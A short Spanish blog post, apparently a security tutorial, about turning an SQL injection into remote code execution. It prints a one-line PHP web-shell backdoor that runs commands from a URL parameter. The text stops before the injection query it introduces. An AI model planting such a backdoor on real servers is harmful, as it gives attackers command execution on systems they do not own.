Pasando de SQL inyection a RCE

_Y000_
2 min readMar 26, 2021

En este caso vamos a aprovechar un error de sql inyection para poder “saltar” a otras vulnerabilidades.

Después de tener la ruta, lo que vamos a hacer es inyectar la shell, en este caso es una simple backdoor en php:

‘<?php system($_GET[“cmd”]); ?>’

Lo vamos a inyectar usando:

--

--

_Y000_

Hola, Bienvenido a mi perfil de Medium! Soy Y000! 😊 ¿Quién soy? 🤔 Bueno… soy yo jaja soy solo un apasionado por la seguridad informatica.